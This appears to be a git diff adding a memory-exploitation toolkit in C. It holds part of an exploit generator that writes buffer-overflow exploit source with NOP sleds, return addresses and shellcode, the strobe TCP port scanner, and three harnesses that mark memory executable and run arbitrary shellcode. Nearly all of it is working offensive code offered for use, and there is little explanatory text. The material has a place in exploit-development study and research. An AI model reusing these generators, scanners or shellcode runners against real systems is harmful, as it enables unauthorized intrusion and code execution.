+ fprintf (fd, "/* Generated with 0x333xes ~ coded by c0wboy\n *"); + fprintf (fd, "\n * ~ www.0x333.org ~\n *\n */ "); + + /* setting header */ + fprintf (fd, "\n#include \n#include \n#include \n"); + fprintf (fd, "#include \n\n#define BIN\t\"%s\"\n#define NOP\t0x90\n", bin); + fprintf (fd, "#define BUFFER\t%i\n", len); + + if (!env) + fprintf (fd, "#define OUTSIDE\t%i\n", out); + + if (hard) + align = 1; + + if (!align) + fprintf (fd, "#define ALIGN\t0\n"); + else + fprintf (fd, "#define ALIGN\t%d\n", align); + + if (step) + fprintf (fd, "#define RET\t0x%x\n", ret_add); + + /* setting shellcode */ + if (step) + fprintf (fd, "\n\n%s\n", shark[s].sh_type); + else + fprintf (fd, "\n\n%s\n", shark[0].sh_type); /* test-shellcode */ + + /* setting main() */ + if (step) + fprintf (fd, "int\nmain ()\n"); + else + fprintf (fd, "int\nmain (int argc, char * argv[])\n"); + + if (env) + fprintf (fd, "{\n int x;\n char buf[BUFFER], *bufz;\n"); + else + fprintf (fd, "{\n int x;\n char buf[BUFFER], out[OUTSIDE], *bufz;\n"); + + if (step) + fprintf (fd, " unsigned long ret_add = RET, *add_ptr ;\n\n"); + else + fprintf (fd, " unsigned long ret_add, *add_ptr ;\n\n" + " if (argc != 2)\n exit (-333);\n\n" + " ret_add = strtoul (argv[1], &argv[1], 16);\n\n"); + + fprintf (fd, " bufz = buf + ALIGN;\n add_ptr = (long *)bufz;\n\n" + " for (x=0; x +#include +#include +#include +#include +#include +#include +#include +#include +#ifdef _AIX +# include +#endif +#include +#include +#include +#include +#include + +#if defined(solaris) || defined(linux) || defined(__FreeBSD__) || defined(__NetBSD__) || defined(__GCC__) +# define fvoid void +#else +# define fvoid +extern int optind; +extern char *optarg; +#endif +#define bool char + +#ifndef INADDR_NONE +# define INADDR_NONE ((unsigned long)-1) +#endif + +#define port_t (unsigned short) + +/* + * the below should be set via the Makefile, but if not... + */ + +#ifndef ETC_SERVICES +# define ETC_SERVICES "/etc/services" +#endif +#ifndef STROBE_SERVICES +# define STROBE_SERVICES "strobe.services" +#endif +#ifndef LIB_STROBE_SERVICES +# define LIB_STROBE_SERVICES "/usr/local/lib/strobe.services" +#endif + +int a_timeout = 20; +char *a_output = NULL; +char *a_services = "strobe.services"; +char *a_input = NULL; +/* char *a_prescan = NULL; */ +int a_start = 1; +int a_end = 65535; +int a_sock_max = 64; +int a_abort = 0; +int a_bindport = 0; +char *a_bindaddr= NULL; +struct in_addr bindaddr; +bool f_linear = 0; +bool f_verbose = 0; +bool f_verbose_stats = 0; +bool f_fast = 0; +bool f_stats = 0; +bool f_quiet = 0; +bool f_delete_dupes = 0; +bool f_minimise = 0; +bool f_dontgetpeername = 0; + +int connects = 0; +int hosts_done = 0; +int attempts_done = 0; +int attempts_outstanding = 0; +struct timeval time_start; + +fd_set set_sel; +fd_set set_sel_r; +fd_set set_sel_w; + +int host_n; +int Argc; +char **Argv; + +FILE *fh_input; + +#define HO_ACTIVE 1 +#define HO_ABORT 2 +#define HO_COMPLETING 4 + +struct hosts_s +{ + char *name; + struct in_addr in_addr; + int port; + int portlist_ent; + struct timeval time_used; + struct timeval time_start; + int attempts; + int attempts_done; + int attempts_highest_done; + int connects; + time_t notice_abort; + int status; +}; +struct hosts_s ho_initial; +struct hosts_s *hosts; + +#define HT_SOCKET 1 +#define HT_CONNECTING 2 + +struct htuple_s +{ + char *name; + struct in_addr in_addr; + int port; + int sfd; + int status; + struct timeval sock_start; + int timeout; + struct hosts_s *host; +}; + +struct htuple_s ht_initial; +struct htuple_s *attempt; + +struct port_desc_s +{ + int port; + char *name; + char *portname; + struct port_desc_s *next; + struct port_desc_s *next_port; +}; + +struct port_desc_s **port_descs; + +int *portlist = NULL; +int portlist_n = 0; + +char * +Srealloc (ptr, len) + char *ptr; + int len; +{ + char *p; + int retries = 10; + while (!(p = ptr? realloc (ptr, len): malloc(len))) + { + if (!--retries) + { + perror("malloc"); + exit(1); + } + if (!f_quiet) + fprintf(stderr, "Smalloc: couldn't allocate %d bytes...sleeping\n", len); + sleep (2); + } + return p; +} + +char * +Smalloc (len) + int len; +{ + return Srealloc (NULL, len); +} + +fvoid +sock_block (sfd) + int sfd; +{ + int flags; + flags = (~O_NONBLOCK) & fcntl (sfd, F_GETFL); + fcntl (sfd, F_SETFL, flags); +} + +fvoid +sock_unblock (sfd) + int sfd; +{ + int flags; + flags = O_NONBLOCK | fcntl (sfd, F_GETFL); + fcntl (sfd, F_SETFL, flags); +} + +int +timeval_subtract (result, x, y) /* from gnu c-lib info.texi */ + struct timeval *result, *x, *y; +{ +/* Perform the carry for the later subtraction by updating y. */ +if (x->tv_usec < y->tv_usec) { + int nsec = (y->tv_usec - x->tv_usec) / 1000000 + 1; + y->tv_usec -= 1000000 * nsec; + y->tv_sec += nsec; +} +if (x->tv_usec - y->tv_usec > 1000000) { + int nsec = (y->tv_usec - x->tv_usec) / 1000000; + y->tv_usec += 1000000 * nsec; + y->tv_sec -= nsec; +} + +/* Compute the time remaining to wait. + `tv_usec' is certainly positive. */ +result->tv_sec = x->tv_sec - y->tv_sec; +result->tv_usec = x->tv_usec - y->tv_usec; + +/* Return 1 if result is negative. */ +return x->tv_sec < y->tv_sec; +} + +fvoid +attempt_clear (h) + struct htuple_s *h; +{ + if (h->status & HT_SOCKET) + { + struct timeval tv1, tv2; + gettimeofday(&tv1, NULL); + timeval_subtract(&tv2, &tv1, &(h->sock_start)); + h->host->time_used.tv_sec+=tv2.tv_sec; + if ((h->host->time_used.tv_usec+=tv2.tv_usec) >= 1000000) + { + h->host->time_used.tv_usec -= 1000000; + h->host->time_used.tv_sec++; + } + attempts_done++; + h->host->attempts_done++; + if (h->port > h->host->attempts_highest_done) + h->host->attempts_highest_done=h->port; + sock_unblock (h->sfd); +/* shutdown (h->sfd, 2); */ + close (h->sfd); + if (FD_ISSET(h->sfd, &set_sel)) + { + FD_CLR (h->sfd, &set_sel); + attempts_outstanding--; + } + } + *h = ht_initial; +} + +fvoid +clear_all () +{ + int n; + for (n = 0; n < a_sock_max; n++) + attempt_clear (&attempt[n]); +} + +fvoid +attempt_init () +{ + int n; + for (n = 0; n < a_sock_max; n++) + attempt[n] = ht_initial; +} + +fvoid +hosts_init () +{ + int n; + for (n = 0; n < a_sock_max; n++) + hosts[n] = ho_initial; +} + +fvoid +fdsets_init () +{ + FD_ZERO(&set_sel_r); /* yes, we have to do this, despite the later */ + FD_ZERO(&set_sel_w); /* assisgnments */ + FD_ZERO(&set_sel); +} + +int +sc_connect (h) + struct htuple_s *h; +{ + struct sockaddr_in sa_in; + int sopts1 = 1; + struct linger slinger; + if ((h->sfd = socket (PF_INET, SOCK_STREAM, 0)) == -1) + return 0; + memset(&sa_in, 0, sizeof(sa_in)); + h->status |= HT_SOCKET; + gettimeofday(&(h->sock_start), NULL); + sock_unblock (h->sfd); + setsockopt (h->sfd, SOL_SOCKET, SO_REUSEADDR, (char *) &sopts1, sizeof (sopts1)); + setsockopt (h->sfd, SOL_SOCKET, SO_OOBINLINE, (char *) &sopts1, sizeof (sopts1)); + slinger.l_onoff = 0; /* off */ + setsockopt (h->sfd, SOL_SOCKET, SO_LINGER, (char *) &slinger, sizeof (slinger)); + sa_in.sin_family = AF_INET; + if (a_bindport) + sa_in.sin_port = a_bindport; + if (a_bindaddr) + sa_in.sin_addr = bindaddr; + if (a_bindaddr || a_bindport) + if (bind (h->sfd, (struct sockaddr *)&sa_in, sizeof(sa_in)) == -1) + { + fprintf(stderr, "couldn't bind %s : %d ", a_bindaddr? a_bindaddr: "0.0.0.0", ntohs(a_bindport)); + perror(""); + if (errno == EACCES) + exit(1); + return 0; + } + sa_in.sin_addr = h->in_addr; + sa_in.sin_port = htons (h->port); + + if (connect (h->sfd, (struct sockaddr *) &sa_in, sizeof (sa_in)) == -1) + { + switch (errno) + { + case EINPROGRESS: + case EWOULDBLOCK: + break; + case ETIMEDOUT: + case ECONNREFUSED: + case EADDRNOTAVAIL: + if (f_verbose) + { + fprintf(stderr, "%s:%d ", h->name, h->port); + perror(""); + } + h->host->attempts++; + attempt_clear (h); + return 1; + default: + if (!f_quiet) + { + fprintf(stderr, "%s:%d ", h->name, h->port); + perror (""); + } + attempt_clear (h); + return 0; + } + } + h->host->attempts++; + h->status |= HT_CONNECTING; + sock_block (h->sfd); + FD_SET(h->sfd, &set_sel); + attempts_outstanding++; + return 1; +} + +int +gatherer_tcp (h) + struct htuple_s *h; +{ + struct port_desc_s *pd; + if (f_minimise) + printf ("%s\t%d\n", h->name, h->port); + else + { + if ((pd = port_descs[h->port])) + { + printf ("%-30s %-16s %5d/tcp %s\n", h->name, pd->portname, h->port, pd->name); + while (!f_delete_dupes && !f_minimise && (pd=pd->next)) + printf ("#%-29s %-16s %5d/tcp %s\n", h->name, pd->portname, h->port, pd->name); + } + else + printf ("%-30s %-16s %5d/tcp unassigned\n", h->name, "unknown", h->port); + } + h->host->connects++; + connects++; + attempt_clear (h); + return 1; +} + +bool +gather () +{ + struct timeval timeout; + struct htuple_s *h; + int n; + int selected; + time_t tim; + + if (!attempts_outstanding) return 1; + set_sel_r=set_sel_w=set_sel; + timeout.tv_sec = 0; + timeout.tv_usec = 250000; /* 1/4 of a second */ + + selected = select (FD_SETSIZE, &set_sel_r, &set_sel_w, 0, &timeout); + /* Look for timeouts */ + + tim = time (NULL); + for ( n = 0 ; n < a_sock_max; n++ ) + { + h = &attempt[n]; + if ((h->status & HT_SOCKET) && + ((h->sock_start.tv_sec + h->timeout) < tim)) + attempt_clear (h); + } + + switch (selected) + { + case -1: + perror ("select"); + return 0; + case 0: + return 1; + } + for (n = 0; selected && (n < a_sock_max); n++) + { + h = &attempt[n]; + if (h->status & HT_CONNECTING) + { + if (FD_ISSET (h->sfd, &set_sel_r) || FD_ISSET (h->sfd, &set_sel_w)) + { + struct sockaddr_in in; + int len = sizeof (in); + selected--; + /* select() lies occasionaly + */ + if (!f_dontgetpeername) /* but solaris2.3 crashes occasionally ;-| */ + { + if (getpeername (h->sfd, (struct sockaddr *) &in, &len) == 0) + gatherer_tcp (h); + else + attempt_clear (h); + } + else + gatherer_tcp (h); + } + } + } + return 1; +} + +bool +add_attempt (add) + struct htuple_s *add; +{ + struct htuple_s *h; + static time_t oldtime; + static int n; + for (;;) + { + for (; n < a_sock_max; n++) + { + h = &attempt[n]; + if (!h->status) + goto foundfree; + } + n = 0; + gather (); + continue; + foundfree: + *h = *add; + if (!sc_connect (h)) + { + gather (); + continue; + } + if ((oldtime + 1) < time (NULL)) + { + oldtime = time (NULL); + gather (); + } + break; + } + return 1; +} + +int +scatter (host, timeout) + struct hosts_s *host; + int timeout; +{ + static struct htuple_s add; + add = ht_initial; + add.host = host; + add.name = host->name; + add.in_addr = host->in_addr; + add.port = host->port; + add.timeout = timeout; + if (f_verbose) + fprintf (stderr, "attempting port=%d host=%s\n", add.port, add.name); + add_attempt (&add); + return 1; +} + +fvoid +wait_end (t) + int t; +{ + time_t st; + st = time (NULL); + while ((st + t) > time (NULL)) + { + gather (); + if (attempts_outstanding<1) break; + } +} + +struct in_addr +resolve (name) + char *name; +{ + static struct in_addr in; + unsigned long l; + struct hostent *ent; + if ((l = inet_addr (name)) != INADDR_NONE) + { + in.s_addr = l; + return in; + } + if (!(ent = gethostbyname (name))) + { + perror (name); + in.s_addr = INADDR_NONE; + return in; + } + return *(struct in_addr *) ent->h_addr; +} + +char * +next_host () +{ + static char lbuf[512]; + hosts_done++; + if (a_input) + { + int n; +reread: + if (!fgets (lbuf, sizeof (lbuf), fh_input)) + { + fclose (fh_input); + a_input = NULL; + return next_host(); + } + if (strchr("# \t\n\r", lbuf[0])) goto reread; + n = strcspn (lbuf, " \t\n\r"); + if (n) + lbuf[n] = '\0'; + return lbuf; + } + if ( host_n >= Argc ) + return NULL; + + return Argv[host_n++]; +} + +bool +host_init (h, name, nocheck) + struct hosts_s *h; + char *name; + bool nocheck; +{ + int n; + *h=ho_initial; + h->in_addr = resolve (name); + if (h->in_addr.s_addr == INADDR_NONE) + return 0; + if (!nocheck) + for (n=0; nin_addr.s_addr) + { + if (!f_quiet) + fprintf(stderr, "ip duplication: %s == %s (last host ignored)\n", + hosts[n].name, name); + return 0; + } + } + h->name = (char *) Smalloc (strlen (name) + 1); + strcpy (h->name, name); + h->port = a_start; + h->status = HO_ACTIVE; + gettimeofday(&(h->time_start), NULL); + return 1; +} + +fvoid +host_clear (h) + struct hosts_s *h; +{ + if (h->name) + { + free (h->name); + } + *h=ho_initial; +} + +fvoid +host_stats (h) + struct hosts_s *h; +{ + struct timeval tv, tv2; + float t, st; + gettimeofday(&tv, NULL); + timeval_subtract(&tv2, &tv, &(h->time_start)); + t = tv2.tv_sec+(float)tv2.tv_usec/1000000.0; + st = h->time_used.tv_sec+(float)h->time_used.tv_usec/1000000.0; + fprintf(stderr, "stats: host = %s trys = %d cons = %d time = %.2fs trys/s = %.2f trys/ss = %.2f\n", + h->name, h->attempts_done, h->connects, t, h->attempts_done/t, h->attempts_done/st); +} + +fvoid +final_stats() +{ + struct timeval tv, tv2; + float t; + gettimeofday(&tv, NULL); + timeval_subtract(&tv2, &tv, &(time_start)); + t = tv2.tv_sec+(float)tv2.tv_usec/1000000.0; + fprintf(stderr, "stats: hosts = %d trys = %d cons = %d time = %.2fs trys/s = %.2f\n", + hosts_done, attempts_done, connects, t, attempts_done/t); +} + +bool skip_host(h) + struct hosts_s *h; +{ + if (a_abort && !h->connects && (h->attempts_highest_done >= a_abort)) /* async pain */ + { + if (h->status & HO_ABORT) + { + if ((time(NULL)-h->notice_abort)>a_timeout) + { + if (f_verbose) + fprintf(stderr, "skipping: %s (no connects in %d attempts)\n", + h->name, h->attempts_done); + return 1; + } + } else + { + h->notice_abort=time(NULL); + h->status|=HO_ABORT; + } + } + return 0; +} + +int +next_port (h) +struct hosts_s *h; +{ + int n; + for (n = h->port; ++n <= a_end;) + { + if (!f_fast) return n; + if (++h->portlist_ent>portlist_n) return -1; + return (portlist[h->portlist_ent-1]); + } + return -1; +} + +fvoid +scan_ports_linear () +{ + struct hosts_s host; + char *name; + while ((name = next_host ())) + { + if (!host_init(&host, name, 1)) continue; + for (;;) + { + scatter (&host, a_timeout); + if (skip_host(&host)) break; + if ((host.port = next_port(&host))==-1) + break; + } + wait_end (a_timeout); + if (f_verbose_stats) + host_stats (&host); + clear_all (); + host_clear(&host); + } +} + +/* Huristics: + * o fast connections have priority == maximise bandwidth i.e + * a port in the hand is worth two in the bush + * + * o newer hosts have priority == lower ports checked more quickly + * + * o all hosts eventually get equal "socket time" == despite + * priorities let no one host hog the sockets permanently + * + * o when host usage times are equal (typically on or shortly after + * initial startup) distribute hosts<->sockets evenly rather than + * play a game of chaotic bifurcatic ping-pong + */ + +fvoid +scan_ports_paralell () +{ + int n; + struct timeval smallest_val; + int smallest_cnt; + char *name; + struct hosts_s *h, *smallest = &hosts[0]; + while (smallest) + { + smallest_val.tv_sec=0xfffffff; + smallest_val.tv_usec=0; + for (n = 0, smallest_cnt = 0xfffffff, smallest = NULL; n < a_sock_max; n++) + { + h = &hosts[n]; + + if (((h->status & HO_COMPLETING) && + (h->attempts_done == h->attempts)) || + skip_host(h)) + { + if (f_verbose_stats) host_stats (h); + host_clear (h); + } + + if (!h->name && ((name = next_host ()))) + if (!host_init (h, name, 0)) + { + host_clear (h); + continue; + } + + if (h->name) + { + if (((h->time_used.tv_sec < smallest_val.tv_sec) || + ((h->time_used.tv_sec == smallest_val.tv_sec) && + (h->time_used.tv_usec <= smallest_val.tv_usec))) && + (((h->time_used.tv_sec != smallest_val.tv_sec) && + (h->time_used.tv_usec != smallest_val.tv_usec)) || + (h->attempts < smallest_cnt))) + { + smallest_cnt = h->attempts; + smallest_val = h->time_used; + smallest = h; + } + } + } + + if (smallest) + { + if (!(smallest->status & HO_COMPLETING)) + { + scatter (smallest, a_timeout); + if ((smallest->port=next_port(smallest))==-1) + smallest->status|=HO_COMPLETING; + } + else + gather(); + } + } +} + +fvoid +loaddescs () +{ + FILE *fh; + char lbuf[1024]; + char desc[256]; + char portname[17]; + unsigned int port; + char *fn; + char prot[4]; + prot[3]='\0'; + if (!(fh = fopen ((fn=a_services), "r")) && + !(fh = fopen ((fn=LIB_STROBE_SERVICES), "r")) && + !(fh = fopen ((fn=ETC_SERVICES), "r"))) + { + perror (fn); + exit (1); + } + port_descs=(struct port_desc_s **) Smalloc(sizeof(struct port_descs_s *) * 65536); + memset(port_descs, 0, 65536); + while (fgets (lbuf, sizeof (lbuf), fh)) + { + char *p; + struct port_desc_s *pd, *pdp; + if (strchr("*# \t\n", lbuf[0])) continue; + if (!(p = strchr (lbuf, '/'))) continue; + *p = ' '; + desc[0]='\0'; + if (sscanf (lbuf, "%16s %u %3s %255[^\r\n]", portname, &port, prot, desc) <3 || strcmp (prot, "tcp") || (port > 65535)) + continue; + pd = port_descs[port]; + if (!pd) + { + portlist = (int *)Srealloc((char *)portlist, ++portlist_n*sizeof(int)); + portlist[portlist_n-1]=port; + } + if (!f_minimise) + { + pdp = (struct port_desc_s *) Smalloc (sizeof (*pd) + strlen (desc) + 1 + strlen (portname) + 1); + if (pd) + { + for (; pd->next; pd = pd->next); + pd->next = pdp; + pd = pd->next; + } else + { + pd = pdp; + port_descs[port] = pd; + } + pd->next = NULL; + pd->name = (char *) (pd) + sizeof (*pd); + pd->portname = pd->name + strlen(desc)+1; + strcpy (pd->name, desc); + strcpy (pd->portname, portname); + } else + port_descs[port] = (struct port_desc_s *)-1; + } + if (f_minimise) + free (port_descs); +} + +fvoid +usage () +{ + fprintf (stderr, "\ +usage: %8s [options]\n\ +\t\t[-v(erbose)]\n\ +\t\t[-V(erbose_stats]\n\ +\t\t[-m(inimise)]\n\ +\t\t[-d(elete_dupes)]\n\ +\t\t[-g(etpeername_disable)]\n\ +\t\t[-s(tatistics)]\n\ +\t\t[-q(uiet)]\n\ +\t\t[-o output_file]\n\ +\t\t[-b begin_port_n]\n\ +\t\t[-e end_port_n]\n\ +\t\t[-p single_port_n]\n\ +\t\t[-P bind_port_n]\n\ +\t\t[-A bind_addr_n]\n\ +\t\t[-t timeout_n]\n\ +\t\t[-n num_sockets_n]\n\ +\t\t[-S services_file]\n\ +\t\t[-i hosts_input_file]\n\ +\t\t[-l(inear)]\n\ +\t\t[-f(ast)]\n\ +\t\t[-a abort_after_port_n]\n\ +\t\t[-M(ail_author)]\n\ +\t\t[host1 [...host_n]]\n", Argv[0]); + exit (1); +} +int +main (argc, argv) + int argc; + char **argv; +{ + int c; + Argc = argc; + Argv = argv; + + while ((c = getopt (argc, argv, "o:dvVmgb:e:p:P:a:A:t:n:S:i:lfsqM")) != -1) + switch (c) + { + case 'o': + a_output = optarg; + break; + case 'd': + f_delete_dupes=1; + break; + case 'v': + f_verbose = 1; + break; + case 'V': + f_verbose_stats = 1; + break; + case 'm': + f_minimise = 1; + break; + case 'g': + f_dontgetpeername = 1; + break; + case 'b': + a_start = atoi (optarg); + break; + case 'e': + a_end = atoi (optarg); + break; + case 'P': + a_bindport = htons (atoi (optarg)); + break; + case 'A': + a_bindaddr = optarg; + bindaddr = resolve (a_bindaddr); + if (bindaddr.s_addr == INADDR_NONE) + { + perror(a_bindaddr); + exit(1); + } + break; + case 'p': + a_start = a_end = atoi (optarg); + break; + case 'a': + a_abort = atoi (optarg); + break; + case 't': + a_timeout = atoi (optarg); + break; + case 'n': + a_sock_max = atoi (optarg); + break; + case 'S': + a_services = optarg; + break; + case 'i': + a_input = optarg; + break; + case 'l': + f_linear = 1; + break; + case 'f': + f_fast = 1; + break; + case 's': + f_stats = 1; + break; + case 'q': + f_quiet = 1; + break; + case 'M': + fprintf(stderr, "Enter mail to author below. End with ^D or .\n"); + system("mail strobe@suburbia.net"); + break; + case '?': + default: + fprintf (stderr, "unknown option %s\n", argv[optind-1]); + usage (); + /* NOT_REACHED */ + } + host_n = optind; + + if (!f_quiet) + fprintf (stderr, "strobe %s (c) 1995 Julian Assange (proff@suburbia.net).\n", VERSION); + if (a_input) + { + if ( ! strcmp("-",a_input) ) { /* Use stdin as input file */ + fh_input = stdin; + } + else { + if (!(fh_input = fopen (a_input, "r"))) + { + perror (a_input); + exit (1); + } + } + } else + { + switch ( argc - host_n ) { /* Number of hosts found on command line */ + case 0: + fh_input = stdin; + a_input = "stdin"; /* Needed in "next_host()" */ + break; + case 1: + f_linear = 1; + break; + } + } + + if ((fh_input==stdin) && !f_quiet) + fprintf (stderr, "Reading host names from stdin...\n"); + + if (a_output) + { + int fd; + if ((fd=open(a_output, O_WRONLY|O_CREAT|O_TRUNC, 0666))==-1) + { + perror(a_output); + exit(1); + } + dup2(fd, 1); + } + attempt = (struct htuple_s *) Smalloc (a_sock_max * sizeof (struct htuple_s)); + attempt_init(); + if (!f_linear) + { + hosts = (struct hosts_s *) Smalloc (a_sock_max * sizeof (struct hosts_s)); + hosts_init(); + } + if (!f_minimise || f_fast) + loaddescs (); + fdsets_init(); + gettimeofday(&time_start, NULL); + f_linear ? scan_ports_linear (): + scan_ports_paralell (); + if (f_stats || f_verbose_stats) + final_stats(); + exit (0); +} + diff --git a/Memory_Exploits/C-codes/testing_shellcode.c b/Memory_Exploits/C-codes/testing_shellcode.c new file mode 100644 index 0000000..bed9fe0 --- /dev/null +++ b/Memory_Exploits/C-codes/testing_shellcode.c @@ -0,0 +1,98 @@ +/* Test Shellcode */ +/* + * Generic program for testing shellcode byte arrays. + * Created by zillion and EVL + * + * Safemode.org !! Safemode.org !! + */ + +#include +#include +#include +#include +#include +#include + +/* + * Print message + */ +static void +croak(const char *msg) { + fprintf(stderr, "%s\n", msg); + fflush(stderr); +} +/* + * Educate user. + */ +static void +usage(const char *prgnam) { + fprintf(stderr, "\nExecute code : %s -e \n", prgnam); + fprintf(stderr, "Convert code : %s -p \n\n", prgnam); + fflush(stderr); + exit(1); +} +/* + * Signal error and bail out. + */ +static void +barf(const char *msg) { + perror(msg); + exit(1); +} + +/* + * Main code starts here + */ + +int +main(int argc, char **argv) { + FILE *fp; + void *code; + int arg; + int i; + int l; + int m = 15; /* max # of bytes to print on one line */ + + struct stat sbuf; + long flen; /* Note: assume files are < 2**32 bytes long ;-) */ + void (*fptr)(void); + + if(argc < 3) usage(argv[0]); + if(stat(argv[2], &sbuf)) barf("failed to stat file"); + flen = (long) sbuf.st_size; + if(!(code = malloc(flen))) barf("failed to grab required memeory"); + if(!(fp = fopen(argv[2], "rb"))) barf("failed to open file"); + if(fread(code, 1, flen, fp) != flen) barf("failed to slurp file"); + if(fclose(fp)) barf("failed to close file"); + + while ((arg = getopt (argc, argv, "e:p:")) != -1){ + switch (arg){ + case 'e': + croak("Calling code ..."); + fptr = (void (*)(void)) code; + (*fptr)(); + break; + case 'p': + printf("\n\nchar shellcode[] =\n"); + l = m; + for(i = 0; i < flen; ++i) { + if(l >= m) { + if(i) printf("\"\n"); + printf( "\t\""); + l = 0; + } + ++l; + printf("\\x%02x", ((unsigned char *)code)[i]); + } + printf("\";\n\n\n"); + + break; + default : + usage(argv[0]); + } + } + + + return 0; +} + diff --git a/Memory_Exploits/C-codes/testing_shellcode2.c b/Memory_Exploits/C-codes/testing_shellcode2.c new file mode 100644 index 0000000..8e04854 --- /dev/null +++ b/Memory_Exploits/C-codes/testing_shellcode2.c @@ -0,0 +1,299 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include /* See NOTES */ +#include +#include + +/*------------------------------------------ + Shellcode testing program + Usage: + shtest [-s socked_fd_no] {-f file | $'\xeb\xfe' | '\xb8\x39\x05\x00\x00\xc3'} + Usage example: + $ shtest $'\xeb\xfe' # raw shellcode + $ shtest '\xb8\x39\x05\x00\x00\xc3' # escaped shellcode + $ shtest -f test.sc # shellcode from file + $ shtest -f <(python gen_payload.py) # test generated payload + $ shtest -s 5 -f test.sc # create socket at fd=5 + # Allows to test staged shellcodes + # Flow is redirected like this: STDIN -> SOCKET -> STDOUT + Compiling: + gcc -Wall shtest.c -o shtest + Author: hellman (hellman1908@gmail.com) +-------------------------------------------*/ + +char buf[4096]; +int pid1, pid2; +int sock; +int ready; + +void usage(char * err); +int main(int argc, char **argv); + +void load_from_file(char *fname); +void copy_from_argument(char *arg); +void escape_error(); + +int create_sock(); +void run_reader(int); +void run_writer(int); +void set_ready(int sig); + +void run_shellcode(void *sc_ptr); + + +void usage(char * err) { + printf(" Shellcode testing program\n\ + Usage:\n\ + shtest {-f file | $'\\xeb\\xfe' | '\\xb8\\x39\\x05\\x00\\x00\\xc3'}\n\ + Usage example:\n\ + $ shtest $'\\xeb\\xfe' # raw shellcode\n\ + $ shtest '\\xb8\\x39\\x05\\x00\\x00\\xc3' # escaped shellcode\n\ + $ shtest -f test.sc # shellcode from file\n\ + $ shtest -f <(python gen_payload.py) # test generated payload\n\ + $ shtest -s 5 -f test.sc # create socket at fd=5 (STDIN <- SOCKET -> STDOUT)\n\ + # Allows to test staged shellcodes\ + # Flow is redirected like this: STDIN -> SOCKET -> STDOUT\ + Compiling:\n\ + gcc -Wall shtest.c -o shtest\n\ + Author: hellman (hellman1908@gmail.com)\n"); + if (err) printf("\nerr: %s\n", err); + exit(1); +} + +int main(int argc, char **argv) { + char * fname = NULL; + int c; + + pid1 = pid2 = -1; + sock = -1; + + while ((c = getopt(argc, argv, "hus:f:")) != -1) { + switch (c) { + case 'f': + fname = optarg; + break; + case 's': + sock = atoi(optarg); + if (sock <= 2 || sock > 1024) + usage("bad descriptor number for sock"); + break; + case 'h': + case 'u': + usage(NULL); + default: + usage("unknown argument"); + } + } + + if (argc == 1) + usage(NULL); + + if (optind < argc && fname) + usage("can't load shellcode both from argument and file"); + + if (!(optind < argc) && !fname) + usage("please provide shellcode via either argument or file"); + + if (optind < argc) { + copy_from_argument(argv[optind]); + } + else { + load_from_file(fname); + } + + //create socket if needed + if (sock != -1) { + int created_sock = create_sock(sock); + printf("Created socket %d\n", created_sock); + } + + run_shellcode(buf); + return 100; +} + +void load_from_file(char *fname) { + FILE * fd = fopen(fname, "r"); + if (!fd) { + perror("fopen"); + exit(100); + } + + int c = fread(buf, 1, 4096, fd); + printf("Read %d bytes from '%s'\n", c, fname); + fclose(fd); +} + +void copy_from_argument(char *arg) { + //try to translate from escapes ( \xc3 ) + + bzero(buf, sizeof(buf)); + strncpy(buf, arg, sizeof(buf)); + + int i; + char *p1 = buf; + char *p2 = buf; + char *end = p1 + strlen(p1); + + while (p1 < end) { + i = sscanf(p1, "\\x%02x", (unsigned int *)p2); + if (i != 1) { + if (p2 == p1) break; + else escape_error(); + } + + p1 += 4; + p2 += 1; + } +} + +void escape_error() { + printf("Shellcode is incorrectly escaped!\n"); + exit(1); +} + +int create_sock() { + int fds[2]; + int sock2; + + int result = socketpair(AF_UNIX, SOCK_STREAM, 0, fds); + if (result == -1) { + perror("socket"); + exit(101); + } + + if (sock == fds[0]) { + sock2 = fds[1]; + } + else if (sock == fds[1]) { + sock2 = fds[0]; + } + else { + dup2(fds[0], sock); + close(fds[0]); + sock2 = fds[1]; + } + + ready = 0; + signal(SIGUSR1, set_ready); + + /* + writer: stdin -> socket (when SC exits/fails, receives SIGCHLD and exits) + \--> main: shellcode (when exits/fails, sends SIGCHLD to writer and closes socket) + \--> reader: sock -> stdout (when SC exits/fails, socket is closed and reader exits) + main saves pid1 = reader, + pid2 = writer + to send them SIGUSR1 right before running shellcode + */ + + pid1 = fork(); + if (pid1 == 0) { + close(sock); + run_reader(sock2); + } + + pid2 = fork(); + if (pid2 > 0) { // parent - writer + signal(SIGCHLD, exit); + close(sock); + run_writer(sock2); + } + pid2 = getppid(); + + close(sock2); + return sock; +} + +void run_reader(int fd) { + char buf[4096]; + int n; + + while (!ready) { + usleep(0.1); + } + + while (1) { + n = read(fd, buf, sizeof(buf)); + if (n > 0) { + printf("RECV %d bytes FROM SOCKET: ", n); + fflush(stdout); + write(1, buf, n); + } + else { + exit(0); + } + } +} + +void run_writer(int fd) { + char buf[4096]; + int n; + + while (!ready) { + usleep(0.1); + } + + while (1) { + n = read(0, buf, sizeof(buf)); + if (n > 0) { + printf("SENT %d bytes TO SOCKET\n", n); + write(fd, buf, n); + } + else { + shutdown(fd, SHUT_WR); + close(fd); + wait(&n); + exit(0); + } + } +} + +void set_ready(int sig) { + ready = 1; +} + +void run_shellcode(void *sc_ptr) { + int ret = 0, status = 0; + int (*ptr)(); + + ptr = sc_ptr; + mprotect((void *) ((unsigned int)ptr & 0xfffff000), 4096 * 2, 7); + + void *esp, *ebp; + void *edi, *esi; + + asm ("movl %%esp, %0;" + "movl %%ebp, %1;" + :"=r"(esp), "=r"(ebp)); + + asm ("movl %%esi, %0;" + "movl %%edi, %1;" + :"=r"(esi), "=r"(edi)); + + printf("Shellcode at %p\n", ptr); + printf("Registers before call:\n"); + printf(" esp: %p, ebp: %p\n", esp, ebp); + printf(" esi: %p, edi: %p\n", esi, edi); + + printf("----------------------\n"); + if (pid1 > 0) kill(pid1, SIGUSR1); + if (pid2 > 0) kill(pid2, SIGUSR1); + + ret = (*ptr)(); + + if (sock != -1) + close(sock); + + wait(&status); + + printf("----------------------\n"); + + printf("Shellcode returned %d\n", ret); + exit(0); +} + diff --git a/Memory_Exploits/C-codes/testing_shellcode3.c b/Memory_Exploits/C-codes/testing_shellcode3.c new file mode 100644 index 0000000..a99153c --- /dev/null +++ b/Memory_Exploits/C-codes/testing_shellcode3.c @@ -0,0 +1,12 @@ +#include //IO header +#include //Functions on favor of strings +#include //exit() function +char shellcode[] = ""; /* Global array */ +int main(int argc, char **argv) +{ + int (*ret)(); /* ret is a func pointer*/ + ret = (int(*)())shellcode; /* ret points to our shellcode */ + + (int)(*ret)(); /* shellcode is type caste as a function */ + 